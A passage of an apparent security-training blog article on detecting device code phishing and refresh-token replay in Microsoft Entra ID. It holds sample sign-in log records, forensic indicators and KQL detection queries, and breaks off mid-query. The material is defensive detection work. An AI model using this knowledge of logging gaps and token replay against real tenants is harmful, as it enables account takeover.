tostring(InitiatedBy.user.userPrincipalName)</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    | project UPN, RegistrationTime = TimeGenerated, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">              DeviceName = tostring(TargetResources[0].displayName);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">DeviceCodeLogins</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| join kind=inner DeviceRegistrations on $left.UserPrincipalName == $right.UPN</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where (RegistrationTime - DeviceCodeTime) between (0min .. 30min)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project UserPrincipalName, DeviceCodeTime, RegistrationTime, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          IPAddress, DeviceName, CorrelationId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by DeviceCodeTime desc</span><br></span></code></pre></div></div>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-4--what-entra-id-logs-and-what-it-doesnt\">Part 4  What Entra ID Logs and What It Doesn't<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-4--what-entra-id-logs-and-what-it-doesnt\" class=\"hash-link\" aria-label=\"Direct link to Part 4  What Entra ID Logs and What It Doesn't\" title=\"Direct link to Part 4  What Entra ID Logs and What It Doesn't\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor 
anchorTargetStickyNavbar_Vzrq\" id=\"41-sign-in-log-taxonomy\">4.1 Sign-In Log Taxonomy<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#41-sign-in-log-taxonomy\" class=\"hash-link\" aria-label=\"Direct link to 4.1 Sign-In Log Taxonomy\" title=\"Direct link to 4.1 Sign-In Log Taxonomy\" translate=\"no\">​</a></h3>\n<p>Entra ID produces three sign-in log types, and they are <strong>not equally monitored</strong>:</p>\n<table><thead><tr><th>Log Table</th><th>What It Captures</th><th>Default Retention</th><th>Alert Coverage</th></tr></thead><tbody><tr><td><code>SigninLogs</code></td><td>Interactive sign-ins (browser, client app prompts)</td><td>30 days</td><td>High  most orgs monitor this</td></tr><tr><td><code>NonInteractiveUserSignInLogs</code></td><td>Silent token refreshes (background, refresh_token grants)</td><td>30 days</td><td><strong>Low</strong>  often not ingested into SIEM</td></tr><tr><td><code>ServicePrincipalSignInLogs</code></td><td>App-to-app authentication</td><td>30 days</td><td>Medium</td></tr><tr><td><code>ManagedIdentitySignInLogs</code></td><td>Managed identity token requests</td><td>30 days</td><td>Low</td></tr></tbody></table>\n<p><strong>The critical gap: Token replay most commonly appears in <code>NonInteractiveUserSignInLogs</code>.</strong> When an attacker uses a stolen refresh token to silently obtain new access tokens, this generates entries in that table  not in <code>SigninLogs</code>. 
Many organizations either don't ingest this table into their SIEM, or don't alert on it with the same rigor.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"42-what-a-device-code-phishing-sign-in-looks-like-in-logs\">4.2 What a Device Code Phishing Sign-In Looks Like in Logs<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#42-what-a-device-code-phishing-sign-in-looks-like-in-logs\" class=\"hash-link\" aria-label=\"Direct link to 4.2 What a Device Code Phishing Sign-In Looks Like in Logs\" title=\"Direct link to 4.2 What a Device Code Phishing Sign-In Looks Like in Logs\" translate=\"no\">​</a></h3>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"UserPrincipalName\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"victim@company.com\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AppDisplayName\"</span><span class=\"token 
operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Microsoft Office\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"ClientAppUsed\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Mobile Apps and Desktop clients\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AuthenticationProtocol\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"deviceCode\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AuthenticationRequirement\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"singleFactorAuthentication\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span 
class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"ConditionalAccessStatus\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"success\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"IPAddress\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"185.220.101.x\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"Location\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"City\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Frankfurt\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 
50%)\">\"CountryOrRegion\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"DE\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"DeviceDetail\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"deviceId\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"displayName\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span 
class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"operatingSystem\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"browser\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"RiskDetail\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"none\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"ResultType\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> 
</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"0\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p><strong>Key forensic indicators:</strong></p>\n<ul>\n<li class=\"\"><code>AuthenticationProtocol == \"deviceCode\"</code>  the smoking gun</li>\n<li class=\"\"><code>DeviceDetail</code> fields empty  the token was not bound to a registered device</li>\n<li class=\"\"><code>IPAddress</code> belongs to attacker infrastructure, not the victim's known IPs</li>\n</ul>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"43-what-token-replay-looks-like-in-logs\">4.3 What Token Replay Looks Like in Logs<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#43-what-token-replay-looks-like-in-logs\" class=\"hash-link\" aria-label=\"Direct link to 4.3 What Token Replay Looks Like in Logs\" title=\"Direct link to 4.3 What Token Replay Looks Like in Logs\" translate=\"no\">​</a></h3>\n<div class=\"language-json codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-json codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"UserPrincipalName\"</span><span class=\"token operator\" 
style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"victim@company.com\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AppDisplayName\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"Microsoft Graph\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"AuthenticationProtocol\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"none\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"IsInteractive\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token boolean\" style=\"color:hsl(356, 75%, 47%)\">false</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 
50%)\">\"IPAddress\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"45.152.x.x\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"Location\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">{</span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"CountryOrRegion\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"NL\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"TokenIssuerType\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"AzureAD\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"RiskDetail\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> 
</span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"none\"</span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">,</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">  </span><span class=\"token property\" style=\"color:hsl(256, 54%, 50%)\">\"UniqueTokenIdentifier\"</span><span class=\"token operator\" style=\"color:hsl(212, 92%, 35%)\">:</span><span class=\"token plain\"> </span><span class=\"token string\" style=\"color:hsl(139, 66%, 32%)\">\"ZGJhNzQ4...\"</span><span class=\"token plain\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\"></span><span class=\"token punctuation\" style=\"color:hsl(212, 13%, 16%)\">}</span><br></span></code></pre></div></div>\n<p>The attacker's access pattern will show consistent non-interactive sign-ins at regular intervals (token refresh), from a consistent IP (the attacker's server), accessing Microsoft Graph API endpoints not typical for the victim's normal work pattern.</p>\n<hr>\n<h2 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"part-5--detection-queries-that-actually-work\">Part 5  Detection: Queries That Actually Work<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#part-5--detection-queries-that-actually-work\" class=\"hash-link\" aria-label=\"Direct link to Part 5  Detection: Queries That Actually Work\" title=\"Direct link to Part 5  Detection: Queries That Actually Work\" translate=\"no\">​</a></h2>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"51-detect-device-code-sign-ins-from-unmanaged-contexts\">5.1 Detect Device Code Sign-Ins from Unmanaged Contexts<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#51-detect-device-code-sign-ins-from-unmanaged-contexts\" 
class=\"hash-link\" aria-label=\"Direct link to 5.1 Detect Device Code Sign-Ins from Unmanaged Contexts\" title=\"Direct link to 5.1 Detect Device Code Sign-Ins from Unmanaged Contexts\" translate=\"no\">​</a></h3>\n<p>The highest-fidelity starting point. Device code flow is rarely legitimate for standard enterprise users:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Detect device code authentication where no device is registered</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(7d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where isempty(DeviceDetail.deviceId)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Country = tostring(LocationDetails.countryOrRegion),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    City = 
tostring(LocationDetails.city)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| summarize </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Count = count(),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    UniqueIPs = dcount(IPAddress),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Countries = make_set(Country),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    LastSeen = max(TimeGenerated)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    by UserPrincipalName, AppDisplayName</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by LastSeen desc</span><br></span></code></pre></div></div>\n<p><strong>Tighter version: alert on any device code sign-in for users not in an allowlist:</strong></p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Maintain an allowlist of users/apps with legitimate device code needs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let AllowedDeviceCodeUsers = dynamic([</span><br></span><span class=\"token-line\" 
style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"iot-admin@company.com\",</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    \"printserver-svc@company.com\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">]);</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">SigninLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(1d)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where AuthenticationProtocol == \"deviceCode\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where UserPrincipalName !in (AllowedDeviceCodeUsers)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| project TimeGenerated, UserPrincipalName, IPAddress, </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">          AppDisplayName, LocationDetails, CorrelationId</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by TimeGenerated desc</span><br></span></code></pre></div></div>\n<p>Expected false positive rate when allowlist is properly configured: near zero. 
Legitimate device code use in most enterprises is confined to headless and CLI scenarios, such as <code>az login --use-device-code</code> from a server with no browser, and those identities belong in the allowlist; an ordinary user's mail or Office client has no reason to authenticate this way.</p>\n<h3 class=\"anchor anchorTargetStickyNavbar_Vzrq\" id=\"52-detect-token-replay-via-impossible-travel-in-noninteractive-logs\">5.2 Detect Token Replay via Impossible Travel in NonInteractive Logs<a href=\"https://inferencedefense.com/academy/blog-internal/mfa-bypass-device-code-phishing-token-replay-conditional-access#52-detect-token-replay-via-impossible-travel-in-noninteractive-logs\" class=\"hash-link\" aria-label=\"Direct link to 5.2 Detect Token Replay via Impossible Travel in NonInteractive Logs\" title=\"Direct link to 5.2 Detect Token Replay via Impossible Travel in NonInteractive Logs\" translate=\"no\">​</a></h3>\n<p>This query deliberately targets the gap: non-interactive sign-ins are where token replay hides:</p>\n<div class=\"language-kql codeBlockContainer_Ckt0 theme-code-block\" style=\"--prism-color:hsl(212, 13%, 16%);--prism-background-color:hsl(256, 12%, 98%)\"><div class=\"codeBlockContent_QJqH\"><pre tabindex=\"0\" class=\"prism-code language-kql codeBlock_bY9V thin-scrollbar\" style=\"color:hsl(212, 13%, 16%);background-color:hsl(256, 12%, 98%)\"><code class=\"codeBlockLines_e6Vv\"><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// Detect impossible travel in NonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">// (The table most orgs forget to monitor)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let TimeDeltaThresholdMinutes = 60;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">let MinDistanceKm = 500;</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\" style=\"display:inline-block\"></span><br></span><span class=\"token-line\" style=\"color:hsl(212, 
<span class=\"token plain\">NonInteractiveUserSignInLogs">
13%, 16%)\"><span class=\"token plain\">// Log Analytics table name; the diagnostic-setting category is NonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">AADNonInteractiveUserSignInLogs</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where TimeGenerated &gt; ago(24h)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where ResultType == \"0\"</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Lat = toreal(LocationDetails.geoCoordinates.latitude),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Lon = toreal(LocationDetails.geoCoordinates.longitude),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    Country = tostring(LocationDetails.countryOrRegion)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where isnotnull(Lat) and isnotnull(Lon)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| sort by UserPrincipalName asc, TimeGenerated asc</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| serialize</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| extend </span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PrevLat = prev(Lat, 1),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PrevLon = prev(Lon, 1),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PrevTime = prev(TimeGenerated, 1),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PrevIP = prev(IPAddress, 1),</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">    PrevUser = prev(UserPrincipalName, 1)</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 13%, 16%)\"><span class=\"token plain\">| where UserPrincipalName == PrevUser</span><br></span><span class=\"token-line\" style=\"color:hsl(212, 